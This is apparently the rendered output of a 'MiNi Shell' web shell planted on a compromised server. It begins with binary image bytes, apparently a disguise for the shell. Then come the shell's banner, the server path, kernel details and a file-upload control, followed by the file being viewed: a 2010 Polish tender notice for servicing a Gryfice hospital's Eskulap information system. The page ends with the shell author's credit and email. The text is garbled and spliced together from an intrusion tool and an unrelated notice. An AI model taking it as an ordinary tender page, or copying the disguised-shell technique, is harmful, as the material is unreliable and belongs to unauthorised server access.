JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100209/36454-N-2010.html

<p class="kh_header"><b>Gryfice: Serwis systemu informatycznego (HIS) Eskulap w SPZZOZ Gryfice</b><br>
<b>Numer ogłoszenia: 36454 - 2010; data zamieszczenia: 09.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Niechorska 27, 72-300 Gryfice, woj. zachodniopomorskie, tel. 091 3842127, faks 091 3842127.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.medicam.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Serwis systemu informatycznego (HIS) Eskulap w SPZZOZ Gryfice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Obligatoryjny Serwis Aplikacji 
Przedmiot usługi
Gotowość WYKONAWCY do usuwania Błędów Oprogramowania Aplikacyjnego.
Procedura realizacji ZAMAWIAJĄCY
Uprawnieni pracownicy ZAMAWIAJĄCEGO dokonują zgłoszenia Błędu Aplikacji poprzez dostarczenie do Serwisu dokumentu w formie elektronicznej z opisem błędu, lub telefonicznie. W celu umożliwienia Serwisowi zapoznania się z meritum problemu zgłoszenie powinno zawierać informacje uzupełniające oraz przykłady np. zrzuty z ekranu.

Procedura realizacji SERWIS
1. Jeżeli informacje zawarte w zgłoszeniu nie pozwalają na udzielenie jednoznacznej odpowiedzi, Serwis kontaktuje się z ZAMAWIAJĄCYM w celu dokonania analizy przedmiotu zgłoszenia lub uzupełnienia zawartych w nim  informacji. 
2. Jeżeli w wyniku działań serwisu przedstawiciel ZAMAWIAJĄCEGO zobligowany jest do pisemnego uzupełnienia zgłoszenia to następuje zawieszenie terminu realizacji zgłoszenia, do czasu uzupełnienia zgłoszenia.
3. Serwis nie później, niż w czasie obsługi zgłoszenia podejmuje jedno z następujących działań:
- przekazuje ZAMAWIAJĄCEGO procedurę usunięcia Błędu Aplikacji we własnym zakresie,
- zdalnie usuwa Błąd Aplikacji, 
- usuwa błąd Aplikacji w siedzibie ZAMAWIAJĄCEGO. 
4. Jeżeli Błąd Aplikacji jest Usterką Programistyczną, Serwis nie później, niż  w czasie obsługi zgłoszenia przekazuje Autorowi w celu opracowania Update usuwającego zidentyfikowaną usterkę. Po otrzymaniu od Autora Update Serwis niezwłocznie lecz nie później, niż w czasie usunięcia Usterki Programistycznej dostarcza Update ZAMAWIAJĄCEMU oraz informuje o tym fakcie poprzez wysłanie powiadomienia na wskazany w Umowie adres poczty elektronicznej.  
2.	Konsultacje
Przedmiot usługi
Gotowość WYKONAWCY do świadczenia ZAMAWIAJĄCEMU konsultacji  w zakresie Aplikacji Eskulap.
Procedura realizacji ZAMAWIAJĄCY
Uprawnieni pracownicy ZAMAWIAJĄCEGO  dokonują zgłoszenia zapotrzebowania na konsultację poprzez dostarczenie do Serwisu dokumentu w formie elektronicznej z opisem błędu, lub telefonicznie.  W celu umożliwienia Serwisowi zapoznania się z meritum problemu zgłoszenie powinno zawierać informacje uzupełniające oraz przykłady np. zrzuty z ekranu.
Procedura realizacji SERWIS
1. Jeżeli informacje zawarte w zgłoszeniu nie pozwalają na udzielenie jednoznacznej odpowiedzi, Serwis kontaktuje się z ZAMAWIAJĄCYM w celu dokonania analizy przedmiotu zgłoszenia  lub uzupełnienia zawartych w nim  informacji.  
2. Jeżeli w wyniku działań serwisu przedstawiciel ZAMAWIAJĄCEGO zobligowany jest do pisemnego uzupełnienia zgłoszenia to następuje zawieszenie terminu realizacji zgłoszenia, do czasu uzupełnienia zgłoszenia.
3. Jeżeli zgłoszenie jest kompletne konsultant udziela konsultacji drogą elektroniczną lub w przypadkach, w których przedmiot zgłoszenia tego wymaga, drogą telefoniczną.

3.	Zarządzanie umowami z NFZ
Przedmiot usługi
Gotowość WYKONAWCY do zaczytywania do systemu Eskulap umów i aneksów zawieranych pomiędzy ZAMAWIAJĄCYM a NFZ oraz  ich  poprawnej konfiguracji

Procedura realizacji ZAMAWIAJĄCY
Uprawnieni pracownicy ZAMAWIAJĄCEGO dokonują zgłoszenia terminu zaczytania do systemu Eskulap umowy z NFZ lub aneksu do umowy poprzez dostarczenie do Serwisu dokumentu w formie elektronicznej.
Zgłoszenie powinno zawierać również plik do zaczytania lub miejsce, skąd plik może zostać pobrany.
ZAMAWIAJĄCY zobowiązany jest do:
-wyłączności na zaczytywanie i konfigurację umów dla WYKONAWCY,
-zapewnienia stabilnego i wydajnego łącza, umożliwiającego realizację zdalnie aktualizacji,
-zapewnienia na czas zaczytywania i konfiguracji umów obecności administratora w siedzibie ZAMAWIAJĄCEGO.
-zaniechania eksploatacji Aplikacji Eskulap - Rozliczenia w trakcie jej aktualizacji.
Procedura realizacji SERWIS
1. W dniu realizacji aktualizacji pracownik Serwisu kontaktuje się z uprawnionym pracownikiem ZAMAWIAJĄCEGO w celu potwierdzenia realizacji.
2. W wyznaczonej godzinie pracownik Serwisu dokonuje zaczytania i konfiguracji umowy, zakończenie prac potwierdza mailowo pracownikowi ZAMAWIAJĄCEGO.


4.	Aktualizacja Aplikacji
Przedmiot usługi
Gotowość WYKONAWCY do aktualizacji Aplikacji na serwerze ZAMAWIAJĄCEGO w godzinach pracy Serwisu.

Procedura realizacji ZAMAWIAJĄCY
ZAMAWIAJĄCY zobowiązany jest do zapewnienia:
-stabilnego i wydajnego łącza, umożliwiającego realizację zdalnie aktualizacji,
-zapewnienia na czas aktualizacji obecności administratora w siedzibie ZAMAWIAJĄCEGO

Procedura realizacji SERWIS
1. W dniu realizacji aktualizacji pracownik Serwisu kontaktuje się z uprawnionym pracownikiem ZAMAWIAJĄCEGO w celu potwierdzenia realizacji.
2. W wyznaczonej godzinie pracownik Serwisu dokonuje wykonanie kopii bazy danych przed aktualizacją, a następnie wskazanych aktualizacji zdalnie na serwerze ZAMAWIAJĄCEGO, zakończenie prac potwierdza mailowo pracownikowi ZAMAWIAJĄCEGO. W trakcie aktualizacji Aplikacji na serwerze pracownicy ZAMAWIAJĄCEGO zobligowani są do zapewnienia aktualizacji  na stacjach roboczych ZAMAWIAJĄCEGO.
5.	 Serwis motoru Bazy Danych
Przedmiot usługi
Gotowość WYKONAWCY do usuwania awarii Motoru Bazy Danych.

Procedura realizacji ZAMAWIAJĄCY
zgłoszenia Awarii poprzez dostarczenie do Serwisu dokumentu w formie elektronicznej z opisem błędu, lub telefonicznie. W celu umożliwienia Serwisowi zapoznania się z meritum problemu zgłoszenie powinno zawierać informacje uzupełniające oraz przykłady np. zrzuty z ekranu.
ZAMAWIAJĄCY zobowiązany jest do zapewnienia:
-stabilnego i wydajnego łącza, umożliwiającego realizację zdalnie aktualizacji,
-zapewnienia na czas naprawy obecności administratora w siedzibie ZAMAWIAJĄCEGO.
Procedura realizacji SERWIS
1. Jeżeli informacje zawarte w zgłoszeniu nie pozwalają na udzielenie jednoznacznej odpowiedzi, Serwis kontaktuje się z ZAMAWIAJĄCYM w celu dokonania analizy przedmiotu zgłoszenia lub uzupełnienia zawartych w nim  informacji.  
2. Jeżeli w wyniku działań serwisu przedstawiciel ZAMAWIAJĄCEGO zobligowany jest do pisemnego uzupełnienia zgłoszenia to następuje zawieszenie terminu realizacji zgłoszenia, do czasu uzupełnienia zgłoszenia.
3. Serwis nie później, niż w czasie obsługi zgłoszenia, wszczyna działania mające na celu usunięcie awarii i w zależności od potrzeb realizuje następujące czynności:
-zatrzymywanie i uruchamianie bazy danych, 
-zatrzymywanie i uruchamianie listener-a, 
-odblokowywanie kont użytkowników,
-kompilacja obiektów bazy danych,
-przeliczanie statystyk bazy danych, 
-dodawania i modyfikacja przestrzeni tabel.
Czas obsługi zgłoszenia:
-Czas reakcji 8 godzin, Czas liczony od momentu zgłoszenia przez ZAMAWIAJĄCEGO  do momentu podjęcia działań przez SERWIS. Obowiązuje w godzinach pracy Serwisu. W przypadku dokonania zgłoszenia o Awarii na 3h przed końcem pracy serwisu, realizacja zgłoszenia nastąpi w dniu następnym.
-Czas usunięcia awarii. Od momentu podjęcia działań przez SERWIS do usunięcia awarii. W przypadku /kiedy praca z aplikacją nie jest możliwa z powodu uszkodzenia/ - Nie dłużej niż 24h od daty i godziny podjęcia działań przez SERWIS.
-Czas usunięcia usterki. Od momentu podjęcia działań przez SERWIS do usunięcia usterki. W przypadku wadliwego działania, ale nie zaburzającego znacząco dla ZAMAWIAJĄCEGO pracy z aplikacją - Nie dłużej niż 72h od daty i godziny podjęcia działań przez SERWIS..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia /nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Certyfikaty/świadectwa wystawione przez producenta SZBD Oracle, dla pracowników zatrudnionych przez Wykonawcę, o umiejętności administrowania systemem zarządzania bazą danych Oracle 10;</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy, że aktualizacje oprogramowania będą zgodne  z obowiązującymi przepisami i aktami normatywnymi, zarówno co do strony merytorycznej jak i technicznej,  a w szczególności będą spełniać minimalne wymagania dla systemów teleinformatycznych, przy pomocy których Zamawiający realizuje zadania publiczne /Rozporządzenie Rady Ministrów z dnia 11 października 2005r. w sprawie minimalnych wymagań dla systemów teleinformatycznych Dz. U. 2005 nr 212 poz. 1766/;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.medicam.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej 
ul. Niechorska 27, 
72-300 Gryfice 
Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2010 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej 
ul. Niechorska 27, 
72-300 Gryfice 
SEKRETARIAT- II piętro, pok. 203.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com